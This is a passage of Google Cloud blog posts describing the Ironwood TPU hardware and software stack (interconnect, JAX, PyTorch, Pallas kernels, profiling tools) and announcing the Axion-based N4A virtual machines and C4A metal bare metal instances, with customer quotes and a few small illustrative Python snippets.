Software target: This hardware design is explicitly targeted by the Accelerated Linear Algebra (XLA) compiler, using a software co-design philosophy that combines the broad benefits of whole-program optimization with the precision of hand-crafted custom kernels. XLA’s compiler-centric approach provides a powerful performance baseline by fusing operations into optimized kernels that saturate the MXU and VPU. This approach delivers good “out of the box” performance with broad framework and model support. This general-purpose optimization is then complemented by custom kernels (detailed below in the Pallas section) to achieve peak performance on specific model-hardware combinations. This dual-pronged strategy is a fundamental tenet of the co-design.

The figure below shows the layout of the Ironwood chip:

This specialized design extends to the connectivity between TPU chips, which supports massive scale-up and scale-out: a complete Ironwood superpod provides a total bandwidth of 88,473.6 Tbps (11,059.2 TB/s).
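The two bandwidth figures are the same quantity in different units, which a short calculation confirms. The per-chip share computed below is derived here, not quoted from the post: it assumes the aggregate is spread evenly over the 9,216 chips of a superpod (the chip count given elsewhere in this post).

```python
# Unit conversion for the aggregate superpod bandwidth figure.
SUPERPOD_TBPS = 88_473.6    # terabits per second, as quoted above
CHIPS_PER_SUPERPOD = 9_216  # superpod size stated elsewhere in this post

total_tb_per_s = SUPERPOD_TBPS / 8                   # 8 bits per byte
per_chip_tbps = SUPERPOD_TBPS / CHIPS_PER_SUPERPOD   # assumes an even split per chip

print(f"{total_tb_per_s:,.1f} TB/s in total")
print(f"{per_chip_tbps:.1f} Tbps per chip (derived, assuming an even split)")
```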

The building block: Cubes and ICI. Each physical Ironwood host has four TPU chips. A single rack of these hosts has 64 Ironwood chips and forms a “cube”. Within this cube, every chip is connected via multiple high-speed Inter-Chip Interconnect (ICI) links that form a direct 3D Torus topology. This creates an extremely dense, all-to-all network fabric, enabling massive bandwidth and low latency for distributed operations within the cube.

Scaling with OCS: Pods and Superpods. To scale beyond a single cube, multiple cubes are connected using an Optical Circuit Switch (OCS) network. This is a dynamic, reconfigurable optical network that connects entire cubes, allowing the system to scale from a small “pod” (e.g., a 256-chip Ironwood pod with four cubes) to a massive “superpod” (e.g., a 9,216-chip system with 144 cubes). This OCS-based topology is key to fault tolerance. If a cube or link fails, the OCS fabric manager instructs the OCS to optically bypass the unhealthy unit and establish new, complete optical circuits connecting only the healthy cubes, swapping in a designated spare. This dynamic reconfigurability allows for both resilient operation and the provisioning of efficient “slices” of any size. For the largest-scale systems, into the hundreds of thousands of chips, multiple superpods can then be connected via a standard Data-Center Network (DCN).
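The pod and superpod sizes follow directly from the cube building block. The sketch below only restates the arithmetic from the text (four chips per host, 64 chips per cube); the function name is hypothetical.

```python
# Chip counts derived from the cube building block described above.
CHIPS_PER_HOST = 4
CHIPS_PER_CUBE = 64


def chips_in_slice(num_cubes: int) -> int:
    """Return the number of chips in a slice made of whole cubes."""
    return num_cubes * CHIPS_PER_CUBE


hosts_per_cube = CHIPS_PER_CUBE // CHIPS_PER_HOST

print(f"hosts per cube: {hosts_per_cube}")
print(f"4-cube pod: {chips_in_slice(4)} chips")
print(f"144-cube superpod: {chips_in_slice(144):,} chips")
```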

Chips can be configured in different “slices” with different OCS topologies as shown below.

Each chip is connected to 6 other chips in the 3D torus and provides 3 distinct axes for parallelism.
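To see where the six neighbors come from, consider a chip at coordinate (x, y, z) in a torus: it has one neighbor in each direction along each of the three axes, with wraparound at the edges. The sketch below assumes a 4 x 4 x 4 arrangement for a 64-chip cube, which is an illustrative assumption and not a layout stated in this post.

```python
from typing import List, Tuple

Coord = Tuple[int, int, int]


def torus_neighbors(coord: Coord, dims: Coord) -> List[Coord]:
    """Return the neighbors of `coord` in a 3D torus of shape `dims`."""
    neighbors = []
    for axis in range(3):
        for step in (-1, 1):
            nxt = list(coord)
            # The modulo provides the wraparound link that makes this a torus.
            nxt[axis] = (nxt[axis] + step) % dims[axis]
            neighbors.append(tuple(nxt))
    return neighbors


DIMS = (4, 4, 4)  # assumed shape for a 64-chip cube (illustrative only)
corner = torus_neighbors((0, 0, 0), DIMS)
print(corner)
```

Even a chip on the "corner" of the grid has six distinct neighbors, because the wraparound links connect it to the opposite face along each axis.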

Ironwood delivers this performance while focusing on power efficiency, allowing AI workloads to run more cost-effectively. Ironwood perf/watt is 2x relative to Trillium, our previous-generation TPU. Our advanced liquid cooling solutions and optimized chip design can reliably sustain up to twice the performance of standard air cooling even under continuous, heavy AI workloads. Ironwood is nearly 30x more power efficient than our first Cloud TPU from 2018 and is our most power-efficient chip to date.

It’s the software stack’s job to translate high-level code into optimized instructions that leverage the full power of the hardware. The stack supports two primary frameworks: the JAX ecosystem, which offers maximum performance and flexibility, as well as PyTorch on TPUs, which provides a native experience for the PyTorch community.

2. Optimizing the entire AI lifecycle

We use the principle of a co-designed Ironwood hardware and software stack to deliver maximum performance and efficiency across every phase of model development, with specific hardware and software capabilities tuned for each stage.

Pre-training: This phase demands sustained, massive-scale computation. A full 9,216-chip Ironwood superpod leverages the OCS and ICI fabric to operate as a single, massive parallel processor, achieving maximum sustained FLOPS utilization through different data formats. Running a job of this magnitude also requires resilience, which is managed by high-level software frameworks like MaxText, detailed in Section 3.3, that handle fault tolerance and checkpointing transparently.

Post-training (Fine-tuning and alignment): This stage includes diverse, FLOPS-intensive tasks like supervised fine-tuning (SFT) and Reinforcement Learning (RL), all requiring rapid iteration. RL, in particular, introduces complex, heterogeneous compute patterns. This stage often requires two distinct types of jobs to run concurrently: high-throughput, inference-like sampling to generate new data (often called ‘actor rollouts’), and compute-intensive, training-like ‘learner’ steps that perform the gradient-based updates. Ironwood’s high-throughput, low-latency network and flexible OCS-based slicing are ideal for this type of rapid experimentation, efficiently managing the different hardware demands of both sampling and gradient-based updates. In Section 3.3, we discuss how we provide optimized software on Ironwood — including reference implementations and libraries — to make these complex fine-tuning and alignment workflows easier to manage and execute efficiently.

Inference (serving): In production, models must deliver low-latency predictions with high throughput and cost-efficiency. Ironwood is specifically engineered for this, with its large on-chip memory and compute power optimized for both the large-batch “prefill” phase and the memory-bandwidth-intensive “decode” phase of large generative models. To make this power easily accessible, we’ve optimized state-of-the-art serving engines. At launch, we’ve enabled vLLM, detailed in Section 3.3, providing the community with a top-tier, open-source solution that maximizes inference throughput on Ironwood.
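One way to see why decode is memory-bandwidth-intensive: if every model weight has to be read from HBM once per generated token, the time per decode step cannot be lower than the weight size divided by HBM bandwidth. The sketch below uses the 7.4 TB/s peak per-chip bandwidth quoted in this post; the 70-billion-parameter model and one byte per parameter are hypothetical inputs, and the estimate ignores KV-cache traffic, batching, and sharding across chips.

```python
# Rough lower bound on decode step time when weights are streamed from HBM.
HBM_BANDWIDTH_BYTES_PER_S = 7.4e12  # peak per-chip HBM bandwidth quoted in this post


def min_decode_step_seconds(num_params: float, bytes_per_param: float) -> float:
    """Lower bound: time to read every weight from HBM exactly once."""
    weight_bytes = num_params * bytes_per_param
    return weight_bytes / HBM_BANDWIDTH_BYTES_PER_S


# Hypothetical model: 70e9 parameters stored at 1 byte each (e.g., an 8-bit format).
step = min_decode_step_seconds(70e9, 1.0)
print(f"at least {step * 1e3:.2f} ms per decode step on one chip")
```

Batching several requests together amortizes the same weight reads over more tokens, which is why serving engines work to keep decode batches full.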

3. The software ecosystem for TPUs

The TPU stack, and Ironwood’s stack in particular, is designed to be modular, allowing developers to operate at the level of abstraction they need. In this section, we focus on the compiler/runtime, framework, and AI stack libraries.

3.1 The JAX path: Performance and composability

JAX is a high-performance numerical computing system co-designed with the TPU architecture. It provides a familiar NumPy-like API backed by powerful function transformations:

jit (Just-in-Time compilation): Uses the XLA compiler to fuse operations into a single, optimized kernel for efficient TPU execution.
grad (automatic differentiation): Automatically computes gradients of Python functions, the fundamental mechanism for model training.
shard_map (parallelism): The primitive for expressing distributed computations, allowing explicit control over how functions and data are sharded across a mesh of TPU devices, directly mapping to the ICI/OCS topology.

This compositional approach allows developers to write clean, Pythonic code that JAX and XLA transform into highly parallelized programs optimized for TPU hardware. JAX is what Google DeepMind and other Google teams use to build, train, and serve a variety of models.

For most developers, these primitives are abstracted by high-level frameworks, like MaxText, built upon a foundation of composable, production-proven libraries:

Optax: A flexible gradient processing and optimization library (e.g., AdamW)

Orbax: A library for asynchronous checkpointing of distributed arrays across large TPU slices

Qwix: A JAX quantization library supporting Quantization Aware Training (QAT) and Post-Training Quantization (PTQ)

Metrax: A library for collecting and processing evaluation metrics in a distributed setting

Tunix: A high-level library for orchestrating post-training jobs

Goodput: A library for measuring and monitoring real-time ML training efficiency, providing a detailed breakdown of badput (e.g., initialization, data loading, checkpointing)
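To make the goodput and badput terminology concrete, here is a minimal sketch of the underlying ratio: the share of wall-clock time that was not lost to overhead. It is a plain-Python illustration with hypothetical function names and made-up timings, not the API of the Goodput library.

```python
from typing import Dict


def goodput_fraction(total_seconds: float, badput_seconds: Dict[str, float]) -> float:
    """Fraction of wall-clock time spent on productive training."""
    lost = sum(badput_seconds.values())
    if lost > total_seconds:
        raise ValueError("badput cannot exceed total wall-clock time")
    return (total_seconds - lost) / total_seconds


# Hypothetical one-hour job with three badput sources (values are made up).
badput = {"initialization": 120.0, "data_loading": 180.0, "checkpointing": 60.0}
fraction = goodput_fraction(3600.0, badput)
print(f"goodput: {fraction:.0%}")
```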

3.2 The PyTorch path: A native eager experience

To bring Ironwood’s power to the PyTorch community, we are developing a new, native PyTorch experience complete with support for a “native eager mode”, which executes operations immediately as they are called. Our goal is to provide a more natural and developer-friendly way to access Ironwood’s scale, minimizing the code changes and level of effort required to adapt models for TPUs. This approach is designed to make the transition from local experimentation to large-scale training more straightforward.

This new framework is built on three core principles to ensure a truly PyTorch-native environment:

Full eager mode: Enables the rapid prototyping, debugging, and research workflows that developers expect from PyTorch.
Standard distributed APIs: Leverages the familiar torch.distributed API, built on DTensor, for scaling training workloads across TPU slices.
Idiomatic compilation: Uses torch.compile as the single, unified path to JIT compilation, utilizing XLA as its backend to trace the graph and compile it into efficient TPU machine code.

This ensures the transition from local experimentation to large-scale distributed training is a natural extension of the standard PyTorch workflow.

3.3 Frameworks: MaxText, PyTorch on TPU, and vLLM

While JAX and PyTorch provide the computational primitives, scaling to thousands of chips is a supercomputer management problem. High-level frameworks handle the complexities of resilience, fault tolerance, and infrastructure orchestration.

MaxText (JAX): MaxText is an open-source, high-performance LLM pre-training and post-training solution written in pure Python and JAX. MaxText demonstrates optimized training on its library of popular OSS models like DeepSeek, Qwen, gpt-oss, Gemma, and more. Whether users are pre-training large Mixture-of-Experts (MoE) models from scratch, or leveraging the latest Reinforcement Learning (RL) techniques on an OSS model, MaxText provides tutorials and APIs to make things easy. For scalability and resiliency, MaxText leverages Pathways, which was originally developed by Google DeepMind and now provides TPU users with differentiated capabilities like elastic training and multi-host inference during RL.

PyTorch on TPU: We recently shared our proposal about our PyTorch native experience on TPUs at PyTorch Conference 2025, including an early preview of training on TPU with minimal code changes. In addition to the framework itself, we are working with the community (RFC), investing in reproducible recipes, reference implementations, and migration tools to enable PyTorch users to use their favorite frameworks on TPUs. Expect further updates as this work matures.

vLLM TPU (Serving): vLLM TPU is now powered by tpu-inference, an expressive and powerful new hardware plugin that unifies JAX and PyTorch under a single lowering path – meaning both frameworks are translated to optimized TPU code through one common, shared backend. This new unified backend is not only faster than the previous generation of vLLM TPU but also offers broader model coverage. This integration provides more flexibility to JAX and PyTorch users, running PyTorch models performantly with no code changes while also extending native JAX support, all while retaining the standard vLLM user experience and interface.

3.4 Extreme performance: Custom kernels via Pallas

While XLA is powerful, cutting-edge research often requires novel algorithms (e.g., new attention mechanisms, custom padding to handle dynamic ragged tensors, and other optimizations for custom MoE models) that the XLA compiler cannot yet optimize.

The JAX ecosystem solves this with Pallas, a JAX-native kernel programming language embedded directly in Python. Pallas presents a unified, Python-first experience, dramatically reducing cognitive load and accelerating the iteration cycle. Other platforms lack this unified, in-Python approach, forcing developers to fragment their workflow. To optimize these operations, they must drop into a disparate ecosystem of lower-level tools, from DSLs like Triton and CuTe to raw CUDA C++ and PTX. This introduces significant mental overhead by forcing developers to manually manage memory, streams, and kernel launches, pulling them out of their Python-based environment.

This is a clear example of co-design. Developers use Pallas to explicitly manage the accelerator’s memory hierarchy, defining how “tiles” of data are staged from HBM into the extremely fast on-chip SRAM to be operated on by the MXUs. The stack has two main parts:

Pallas: The developer defines the high-level algorithmic structure and memory logistics in Python.
Mosaic: This compiler backend translates the Pallas definition into optimized TPU machine code. It handles operator fusion, determines optimal tiling strategies, and generates software pipelines to perfectly overlap data transfers (HBM-to-SRAM) with computation (on the MXUs), with the sole objective of saturating the compute units.
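The idea of tiling can be illustrated without any accelerator at all. The sketch below is plain Python, not Pallas code: it multiplies two matrices one tile at a time, copying each tile out of the full operands before computing on it, which loosely mirrors staging data from HBM into on-chip memory. The function name and tile size are hypothetical, and a real kernel would also overlap the copies with computation.

```python
from typing import List

Matrix = List[List[float]]


def matmul_tiled(a: Matrix, b: Matrix, tile: int = 2) -> Matrix:
    """Multiply a (n x k) by b (k x m), processing tile-sized blocks."""
    n, k, m = len(a), len(b), len(b[0])
    out = [[0.0] * m for _ in range(n)]
    for i0 in range(0, n, tile):
        for j0 in range(0, m, tile):
            for k0 in range(0, k, tile):
                # "Stage" one tile of each operand (slicing copies the data).
                a_tile = [row[k0:k0 + tile] for row in a[i0:i0 + tile]]
                b_tile = [row[j0:j0 + tile] for row in b[k0:k0 + tile]]
                # Compute on the staged tiles and accumulate into the output.
                for i, a_row in enumerate(a_tile):
                    for j in range(len(b_tile[0])):
                        acc = sum(a_row[p] * b_tile[p][j] for p in range(len(b_tile)))
                        out[i0 + i][j0 + j] += acc
    return out


a = [[1, 2, 3], [4, 5, 6]]
b = [[7, 8], [9, 10], [11, 12]]
result = matmul_tiled(a, b, tile=2)
print(result)
```

The result is independent of the tile size; the tile size only changes how much data is held "close" to the compute at any one time, which is the trade-off a kernel author tunes.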

Because Pallas kernels are JAX-traceable, they are fully compatible with jit, vmap, and grad. This stack provides Python-native extensibility for both JAX and PyTorch, as PyTorch users can consume Pallas-optimized kernels without ever leaving the native PyTorch API. Pallas kernels for PyTorch and JAX models, on both TPU and GPU, are available via Tokamax, the ML ecosystem’s first multi-framework, multi-hardware kernel library.

3.5 Performance engineering: Observability and debugging

The Ironwood stack includes a full suite of tools for performance analysis, bottleneck detection, and debugging, allowing developers to fully optimize their workloads and operate large-scale clusters reliably:

Cloud TPU metrics: Exposes key system-level counters (FLOPS, HBM bandwidth, ICI traffic) to Google Cloud Monitoring that can then be exported to popular monitoring tools like Prometheus.

TensorBoard: Visualizes training metrics (loss, accuracy) and hosts the XProf profiler UI.

XProf (OpenXLA Profiler): The essential toolset for deep performance analysis. It captures detailed execution data from both the host-CPU and all TPU devices, providing:

- Trace Viewer: A microsecond-level timeline of all operations, showing execution, collectives, and “bubbles” (idle time).
- Input Pipeline Analyzer: Diagnoses host-bound vs. compute-bound bottlenecks.
- Op Profile: Ranks all XLA/HLO operations by execution time to identify expensive kernels.
- Memory Profiler: Visualizes HBM usage over time to debug peak memory and fragmentation.

Debugging Tools:

- JAX Debugger (jax.debug): Enables print and breakpoints from within jit-compiled functions.
- TPU Monitoring Library: A real-time diagnostic dashboard (analogous to nvidia-smi) for live debugging of HBM utilization, MXU activity, and running processes.

Beyond performance optimization, developers and infra admins can view fleet efficiency and goodput metrics at various levels (e.g., job, reservation) to ensure maximum utilization of their TPU infrastructure.

4. Conclusion

The Ironwood stack is a complete, system-level co-design, from the silicon to the software. It delivers performance through a dual-pronged strategy: the XLA compiler provides broad, “out-of-the-box” optimization, while the Pallas and Mosaic stack enables hand-tuned kernel performance.

This entire co-designed platform is accessible to all developers, providing first-class, native support for both the JAX and the PyTorch ecosystem. Whether you are pre-training a massive model, running complex RL alignment, or serving at scale, Ironwood provides a direct, resilient, and high-performance path from idea to supercomputer.

Get started today with vLLM on TPU for inference and MaxText for pre-training and post-training.


2025 11 06

GCP – Unlock 2x better price-performance with Axion-based N4A VMs, now in preview

Tibor Kiss Cloud, Google Cloud gcp

Decision makers and builders today face a constant challenge: managing rising cloud costs while delivering the performance their customers demand. As applications evolve to use scale-out microservices and handle ever-growing data volumes, organizations need maximum efficiency from their underlying infrastructure to support their growing general-purpose workloads.

To meet this need, we’re excited to announce our latest Axion-based virtual machine series: N4A, available in preview on Compute Engine, Google Kubernetes Engine (GKE), Dataproc, and Batch, with support in Dataflow and other services coming soon.

N4A is the most cost-effective N-series VM to date, delivering up to 2x better price-performance and 80% better performance-per-watt than comparable current-generation x86-based VMs. This makes it easier for customers to further optimize the Total Cost of Ownership (TCO) for a broad range of general-purpose workloads. We see this with cloud-native businesses running scale-out web servers and microservices on GKE, enterprise teams managing backend application servers and mid-sized databases, and engineering organizations operating large CI/CD build farms.

At Google Cloud, we co-design our compute offerings with storage, networking and software at every layer of the stack, from orchestrators to runtimes, to deliver exceptional system-level performance and cost-efficiency. N4A’s breakthrough price-performance is powered by our latest-generation Google Axion Processors, built on the Arm® Neoverse® N3 compute core, Google Dynamic Resource Management (DRM) technology, and Titanium, Google Cloud’s custom-designed hardware and software system that offloads networking and storage processing to free up the CPU. Titanium is part of Google Cloud’s vertically integrated software stack — from the custom silicon in our servers to our planet-scale network traversing 7.75 million kilometers of terrestrial and subsea fiber across 42 regions — that is engineered to maximize efficiency and provide the ultra-low latency and high bandwidth to customers at global scale.

Redefining general-purpose compute and enabling AI inference

N4A is engineered for versatility, with a feature set to support your general-purpose and CPU-based AI workloads. It comes in predefined and custom shapes, with up to 64 vCPUs and 512GB of DDR5 in high-cpu (2GB of memory per vCPU), standard (4GB per vCPU), and high-memory (8GB per vCPU) configurations, with instance networking up to 50 Gbps of bandwidth. N4A VMs feature support for our latest generation Hyperdisk storage options, including Hyperdisk Balanced, Hyperdisk Throughput, and Hyperdisk ML (coming later), providing up to 160K IOPS and 2.4GB/s of throughput per instance.
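The memory-per-vCPU ratios above determine how much memory a predefined shape carries. The sketch below just multiplies them out; the dictionary keys are illustrative labels chosen here, not official machine type names.

```python
# Memory for a predefined shape, from the per-vCPU ratios in the text.
GB_PER_VCPU = {"high-cpu": 2, "standard": 4, "high-memory": 8}
MAX_VCPUS = 64


def memory_gb(vcpus: int, configuration: str) -> int:
    """Return memory in GB for a given vCPU count and configuration."""
    if not 1 <= vcpus <= MAX_VCPUS:
        raise ValueError(f"vcpus must be between 1 and {MAX_VCPUS}")
    return vcpus * GB_PER_VCPU[configuration]


for name in GB_PER_VCPU:
    print(f"{name}: {memory_gb(MAX_VCPUS, name)} GB at {MAX_VCPUS} vCPUs")
```

The 512GB maximum quoted above corresponds to the high-memory ratio at the full 64 vCPUs.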

N4A performs well across a range of industry-standard benchmarks that represent the key workloads our customers run every day. For example, relative to comparable current-generation x86-based VM offerings, N4A delivers up to 105% better price-performance for compute-bound workloads, up to 90% better price-performance for scale-out web servers, up to 85% better price-performance for Java applications, and up to 20% better price-performance for general-purpose databases.

Footnote: As of October 2025. Performance based on the estimated SPECrate®2017_int_base, estimated SPECjbb2015, MySQL Transactions/minute (RO), and Google internal Nginx Reverse Proxy benchmark scores run in production on comparable latest-generation generally-available VMs with general purpose storage types. Price-performance claims based on published and upcoming list prices for Google Cloud.
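It can help to translate the price-performance percentages above into relative cost for a fixed amount of work. The sketch below assumes that "X% better price-performance" means (1 + X/100) times as much work per unit of spend; that reading is an interpretation made here, not a definition given in the post.

```python
def relative_cost(improvement_pct: float) -> float:
    """Cost of the same work relative to the baseline, given an 'X% better
    price-performance' figure (assumed to mean 1 + X/100 times work per dollar)."""
    return 1.0 / (1.0 + improvement_pct / 100.0)


claims = {
    "compute-bound workloads": 105,
    "scale-out web servers": 90,
    "Java applications": 85,
    "general-purpose databases": 20,
}
for workload, pct in claims.items():
    print(f"{workload}: up to {pct}% better, about {relative_cost(pct):.2f}x the baseline cost")
```

Under this reading, a 100% improvement (2x) halves the cost of a fixed workload, while a 20% improvement reduces it by roughly one sixth.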

In the real world, early adopters are seeing dramatic price-performance improvements from the new N4A instances.

“At ZoomInfo, we operate a massive data intelligence platform where efficiency is paramount. Our core data processing pipelines, which are critical for delivering timely insights to our customers, run extensively on Dataflow and Java services in GKE. In our preview of the new N4A instances, we measured a 60% improvement in price-performance for these key workloads compared to their x86-based counterparts. This allows us to scale our platform more efficiently and deliver more value to our customers, faster.” – Sergei Koren, Chief Infrastructure Architect, ZoomInfo

“Organizations today need performance, efficiency, flexibility, and scale to meet the computing demands of the AI era; this requires the close collaboration and co-design that is at the heart of our partnership with Google Cloud. As N4A redefines cost-efficiency, customers gain a new level of infrastructure optimization, enabling enterprises to choose the right infrastructure for their workload requirements with Arm and Google Cloud.” – Bhumik Patel, Director, Server Ecosystem Development, Infrastructure Business, Arm

Granular control with Custom Machine Types and Hyperdisk

A key advantage of our N-series VMs has always been flexibility, and with N4A, we are bringing one of our most popular features to the Axion family for the first time: Custom Machine Types (CMT). Instead of fitting your workload into a predefined shape, CMTs on N4A let you independently configure the amount of vCPU and memory to meet your application’s unique needs. This ability to right-size your instances means you pay only for the resources you use, minimizing waste and optimizing your total cost of ownership.

This same principle of matching resources to your specific workload applies to storage. N4A VMs feature support for our latest generation of Hyperdisk, allowing you to select the perfect storage profile for your application’s needs:

Hyperdisk Balanced: Offers an optimal mix of performance and cost for the majority of general-purpose workloads, with up to 160K IOPS per N4A VM.
Hyperdisk Throughput: Delivers up to 2.4GiBps of max throughput for bandwidth-intensive analytics workloads like Hadoop or Kafka, providing high-capacity storage at an excellent value.
Hyperdisk ML (post GA): Purpose-built for AI/ML workloads, allows you to attach a single disk containing your model weights or datasets to up to 32 N4A instances simultaneously for large-scale inference or training tasks.
Hyperdisk Storage Pools: Instead of provisioning capacity and performance on a per-volume basis, allows you to provision performance and capacity in aggregate, further optimizing costs by up to 50% and simplifying management.

“At Vimeo, we have long relied on Custom Machine Types to efficiently manage our massive video transcoding platform. Our initial tests on the new Axion-based N4A instances have been very compelling, unlocking a new level of efficiency. We’ve observed a 30% improvement in performance for our core transcoding workload compared to comparable x86 VMs. This points to a clear path for improving our unit economics and scaling our services more profitably, without changing our operational model.” – Joe Peled, Sr. Director of Hosting & Delivery Ops, Vimeo

A growing Arm-based Axion portfolio for customer choice

C-series VMs are designed for workloads that require consistently high performance, e.g., medium-to-large-scale databases and in-memory caches. Alongside them, N-series VMs have been a key Compute Engine pillar, offering a balance of price-performance and flexibility, lowering the cost of running workloads with variable resource needs such as scale-out Java/GKE workloads. We released our first Axion-based machine series, C4A, in October 2024, and the introduction of N4A complements C4A, providing a range of Google Axion instances suited to your workloads’ precise needs.

On top of that, GKE unlocks significant price-performance advantages by orchestrating Axion-based C4A and N4A machine types. GKE leverages Custom Compute Classes to provision and mix these machine types, matching workloads to the right hardware. This automated, heterogeneous cluster management allows teams to optimize their total cost of ownership across their entire application stack.

Also joining the Axion family is C4A.metal, Google Cloud’s first Axion bare metal instance that helps builders meet use cases that require access to the underlying physical server to run specialized applications in a non-virtualized environment, such as automotive systems development, workloads with strict licensing requirements, and Android software development. C4A.metal will be available in preview soon.

Supported by the broad and mature Arm ecosystem, adopting Axion is easier than ever, and the combination of C4A and N4A can help you lower the total cost of running your business, without compromising on performance or workload-specific requirements:

N4A for cost optimization and flexibility. Deliberately engineered for general-purpose workloads that need a balance of price and performance, including scale-out web servers, microservices, containerized applications, open-source databases, batch, data analytics, development environments, data preparation and AI/ML experimentation.
C4A for consistently high performance, predictability, and control. Powering workloads where every microsecond counts, such as medium- to large-scale databases, in-memory caches, cost-effective AI/ML inference, and high-traffic gaming servers. C4A delivers consistent performance, offering a controlled maintenance experience for mission-critical workloads, networking bandwidth up to 100 Gbps, and next-generation Titanium Local SSD storage.

“Migrating to Google Cloud’s Axion portfolio gave us a critical competitive advantage. We slashed our compute consumption by 20% while maintaining low and stable latency with C4A instances, such as our Supply-Side Platform (SSP) backend service. Additionally, C4A enabled us to leverage Hyperdisk with precisely the IOPS we need for our stateful workloads, regardless of instance size. This flexibility gives us the best of both worlds – allowing us to win more ad auctions for our clients while significantly improving our margins. We’re now testing the N4A family by running some of our key workloads that require the most flexibility, such as our API relay service. We are happy to share that several applications running in production are consuming 15% less CPU compared to our previous infrastructure, reducing our costs further, while ensuring that the right instance backs the workload characteristics required.” – Or Ben Dahan, Cloud & Software Architect at Rise

Get started with N4A today

N4A is available during preview in the following Google Cloud regions: us-central1 (Iowa), us-east4 (N. Virginia), europe-west3 (Frankfurt) and europe-west4 (Netherlands) with more regions to follow.

We can’t wait to see what you build. To get access, sign-up here. To learn more, check out the N4A documentation.


2025 11 06

GCP – Announcing Axion C4A metal: Arm-based Axion VMs for specialized use cases

Tibor Kiss Cloud, Google Cloud gcp

Today, we are thrilled to announce C4A metal, our first bare metal instance running on Google Axion processors, available in preview soon. C4A metal is designed for specialized workloads that require direct hardware access and Arm®-native compatibility.

Now, organizations running environments such as Android development, automotive simulation, CI/CD pipelines, security workloads, and custom hypervisors can run them on Google Cloud, without the performance overheads and complexity of nested virtualization.

C4A metal instances, like other Axion instances, are built on the standard Arm architecture, so your applications and operating systems compiled for Arm remain portable across your cloud, on-premises, and edge environments, protecting your development investment. C4A metal offers 96 vCPUs, 768GB of DDR5 memory, and up to 100Gbps of networking bandwidth, with full support for Google Cloud Hyperdisk including Hyperdisk Balanced, Extreme, Throughput, and ML block storage options.

Google Cloud provides workload-optimized infrastructure to ensure the right resources are available for every task. C4A metal, like the Google Cloud Axion virtual machine family, is powered by Titanium, a key component for multi-tier offloads and security that is foundational to our infrastructure. Titanium’s custom-designed silicon offloads networking and storage processing to free up the CPU, and its dedicated SmartNIC manages all I/O, ensuring that Axion cores are reserved exclusively for your application’s performance. Titanium is part of Google Cloud’s vertically integrated software stack — from the custom silicon in our servers to our planet-scale network traversing 7.75 million kilometers of terrestrial and subsea fiber across 42 regions — that is engineered to maximize efficiency and provide the ultra-low latency and high bandwidth to customers at global scale.

Architectural parity for automotive workloads

Automotive customers can benefit from the Arm architecture’s performance, efficiency, and flexible design for in-vehicle systems such as infotainment and Advanced Driver Assistance Systems (ADAS). Axion C4A metal instances enable architectural parity between test environments and production silicon, allowing automotive technology providers to validate their software on the same Arm Neoverse instruction set architecture (ISA) used in production electronic control units (ECUs). This significantly reduces the risk of late-stage integration failures. For performance-sensitive tasks, these customers can execute demanding virtual hardware-in-the-loop (vHIL) simulations with the consistent, low-latency performance of physical hardware, ensuring test results are reliable and accurate. Finally, C4A metal lets providers move beyond the constraints of a physical lab, by dynamically scaling entire test farms and transforming them from fixed capital expenses into flexible operational ones.

“In the era of AI-defined vehicles, the accelerating pace and complexity of technology are pushing us to rethink traditional linear approaches to software development. Google Cloud’s introduction of Axion C4A metal is a major step forward in this journey. By offering full architectural parity on Arm between test environments and physical silicon, customers can benefit from accelerated development cycles, enabling continuous integration and compliance for a variety of specialized use cases.” – Dipti Vachani, Senior Vice President and General Manager, Automotive Business, Arm

“Our partners and customers rely on QNX to deliver the safety, security, reliability, and real-time performance required for their most mission-critical systems — from advanced driver assistance to digital cockpits. As the Software-Defined Vehicle era continues to gain momentum, decoupling software development from physical hardware is no longer optional — it’s essential for innovation at scale. The launch of Google Cloud’s C4A-metal instances on Axion introduces a powerful ARM-based bare metal platform that we are eager to test and support as this will enable transformative cloud infrastructure benefits for our automotive ecosystem.” – Grant Courville, Senior Vice President, Products and Strategy, QNX

“The future of automotive mobility demands unprecedented speed and precision in practice and development. For automakers and suppliers leveraging the Snapdragon Digital Chassis platform, aligning their cloud development and testing environments to ensure parity with the Snapdragon SoCs in the vehicle is absolutely crucial for efficiency and quality. We are excited about Google Cloud’s commitment to this segment — offering C4A-metal instances with Axion is a massive leap forward, giving the automotive ecosystem a true 1:1 physical to virtual environment in the cloud. This breakthrough significantly reduces integration challenges, slashes validation time, and allows our partners to unleash AI-driven features to market faster at scale.” – Laxmi Rayapudi, VP, Product Management, Qualcomm Technologies, Inc.

Align test and production for Android development

The Android platform was built for Arm-based processors, the standard for virtually all mobile devices. By running development and testing pipelines on the bare-metal instances of Axion processors with C4A metal, Android developers can benefit from native performance, eliminating the overhead of emulation management, such as slow instruction-by-instruction translation layers. In addition, they can significantly reduce latency for Android build toolchains and automated test systems, leading to faster feedback cycles. C4A metal also solves the performance challenges of nested virtualization, making it a great platform for scalable Cuttlefish (Cloud Android) environments.
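
One practical consequence of running pipelines natively is that a test job can refuse to start when it lands on a non-Arm host and would otherwise fall back to emulation. A minimal sketch in Python, assuming the runner reports its architecture through the standard library's platform.machine(); the function names and the set of accepted strings are illustrative and not part of any Google Cloud or Android tooling:

```python
import platform

# Architecture strings commonly reported for 64-bit Arm hosts
# (Linux reports "aarch64", macOS reports "arm64").
ARM64_NAMES = {"aarch64", "arm64"}


def is_native_arm64(machine=None):
    """Return True when the host CPU architecture is 64-bit Arm.

    `machine` defaults to platform.machine(); passing it explicitly
    makes the check easy to unit-test.
    """
    if machine is None:
        machine = platform.machine()
    return machine.lower() in ARM64_NAMES


def require_native_arm64(machine=None):
    """Raise instead of silently running Arm test images under emulation."""
    if not is_native_arm64(machine):
        raise RuntimeError("expected a 64-bit Arm host; refusing to emulate")
```

A pipeline step could call require_native_arm64() before launching virtual devices, so a misrouted job fails fast rather than producing slow, emulated results.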

Once available, developers can deploy scalable Cuttlefish environment farms on top of C4A metal instances with an upcoming release of Horizon or by directly leveraging Cloud Android Orchestration. C4A metal allows these virtual devices to run directly on the physical hardware, providing the performance needed to build and manage large, high-fidelity test farms for true continuous testing.

Bare metal access without compromise

As a cloud offering, C4A metal enables a lower total cost of ownership by replacing the entire lifecycle of physical hardware procurement and management with a predictable operational expense. This eliminates the direct capital expenditures of purchasing servers, along with the associated operational costs of hardware maintenance contracts, power, cooling, and physical data center space. You can programmatically provision and de-provision instances to match your exact testing demands, ensuring you are not paying for an over-provisioned fleet of servers sitting idle waiting for peak development cycles.

